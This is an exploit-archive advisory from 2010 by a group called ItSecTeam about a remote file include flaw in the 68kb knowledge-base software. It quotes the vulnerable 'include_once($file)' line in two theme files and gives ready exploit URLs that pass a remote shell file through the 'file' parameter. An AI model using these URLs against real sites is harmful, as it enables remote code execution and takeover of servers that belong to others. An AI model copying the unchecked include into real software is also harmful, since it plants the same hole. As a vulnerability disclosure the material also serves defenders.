[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 68kb multi remote file include
# Published : 2010-03-27
# Author : ItSecTeam
# Previous Title : Open Web Analytics 1.2.3 multi file include
# Next Title : Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC
===========================================================================
( #Topic : 68kb
( #Bug type : multi remote file include
( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory:
www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!
vul:===================================================================
path/themes/front/default/modules/show.php
<?php include_once($file); ?>
vul:===================================================================
path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
---------------------------------------------------------------------
exploit:================================================================
path/themes/front/default/modules/show.php?file=shell.txt?
path/themes/admin/default/modules/show.php?file=shell.txt?
--------------------------------------